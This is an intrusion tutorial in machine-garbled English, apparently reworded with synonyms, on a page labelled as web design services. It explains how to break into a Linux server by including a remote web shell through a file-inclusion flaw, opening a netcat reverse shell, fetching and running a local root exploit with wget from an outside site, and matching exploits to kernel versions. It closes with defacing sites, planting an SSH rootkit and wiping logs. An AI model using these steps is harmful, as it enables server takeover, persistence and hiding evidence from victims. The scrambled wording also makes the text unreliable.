…::[BABY CORP]::… – Web Design Services

You will need:
Quote:
- Vulnerable Site in R.F.I.
- Carapace for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

This aim tutorial is to accord a actual accepted account in action of Rooting in Linux Server with Safe Mod: OFF.Suppose that we accept begin a website with RFI vulnerability:

Code:

http://www.hackedsite.com/folder/index.html?page=

e can run shell exploiting Remote File Inclusion, as follows:

Code:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

where evilscript.txt is our web carapace that we accept already uploaded to our site. (www.mysite.com in the folder: shells)

After we admission in shell, aboriginal of all we will see the adaptation of the atom at the top of the page or by typing: uname – a in Command line.

To abide we accept to affix with backconnection to the box. This can done with two means if we accept the acceptable shell.

We can use the Back-Connect bore of r57/c99 carapace or to upload a backconnector in a writable folder

In a lot of of the shells there is a backconnection affection after to upload the Affix Back Carapace (or addition one carapace in perl/c). We will assay the aboriginal way which is axial the carapace (in our archetype the carapace is r57).

Initially we accessible NetCat and accord to accept in a specific anchorage (this anchorage accept to be accurately opened/forwarded in NAT/Firewall if we accept a router) with the afterward way:

We will type: 11457 in the anchorage ascribe (This is the absence anchorage for the endure versions of r57 shell). We can use and added port.

We press in Windows Start -> Run -> and we type: cmd

After we will go to the NetCat directory:

Quote:

cd C:\Program Files\Netcat
And we type the following command:
Quote:
nc -n -l -v -p 11456
NetCat respond: listening on [any] 11456 …

In the axial page of r57 carapace we acquisition beneath the afterward menu::: Net:: and back-connect. In the IP Anatomy we will blazon our IP (www.cmyip.com to see our ip if we accept dynamic)

In the Anchorage anatomy we will put the anchorage that we opened and NetCat listens.

If we columnist affix the carapace will respond:

Now Software try affix to anchorage 11456 …

If our settings are actual NetCat will accord us a carapace to the server

Now we wil abide to the Rooting proccess.

We accept to acquisition a writable binder in adjustment to download and abridge the Bounded Basis Accomplishment that will accord us basis priviledges in the box. Depending on the adaptation of the Linux atom there are altered exploits. Some times the exploits abort to run because some boxes are patched or we don’t accept the actual permissions.List of the exploits/kernel:

Quote:
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will charge the h00lyshit exploit.

Some sites that we can acquisition Bounded Basis Exploits:

milw0rm (Try Search: “linux kernel”)

Other sites: www.packetstormsecurity.org | www.milw0rm.com or try Googlin’ you can find ‘em all

We can acquisition writable folders/files by typing:
Code:

find / -perm -2 -ls

We can use the /tmp binder which is a accepted writable folder

We type:
Code:

cd /tmp

To download the bounded basis accomplishment we can use a download command for linux like wget.

For example:
Quote:
wget http://www.yoursite.com/localroot/h00lyshit.c
where http://www.yoursite.com/localroot/h00lyshit.c is the url of h00lyshit.

After the download we accept to abridge the accomplishment (Read the apprenticeship of the accomplishment afore the compile)

For the h00lyshit we accept to type:
Code:

gcc h00lyshit.c -o h00lyshit

Now we accept created the executable file: h00lyshit.

The command to run this accomplishment is:
Code:

./h00lyshit

We charge a actual big book on the deejay in adjustment to run auspiciously and to get root.

We accept to actualize a big book in /tmp or into addition writable folder.

The command is:
Code:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We accept to delay 2-3 minutes for the book creation

If this command fails we can try:
Code:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can procced to the endure step. We can run the accomplishment by typing:
Code:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a altered writable binder and the largefile is created in /tmp)

If there are not active errors (maybe the atom is patched or is something amiss with accomplishment run or ample file) we will get root

To analysis if we got root:

id or

whoami

If it says basis we got root!

Now we can deface/mass blemish all the sites of the server or to bureaucracy a rootkit (e.g. SSHDoor) and to yield ssh/telnet carapace admission to the server.

We accept to abolish all logs in adjustment to be safe with a log cleaner. A acceptable cleaner for this job is the MIG Log Cleaner.

Popularity: 69% [?]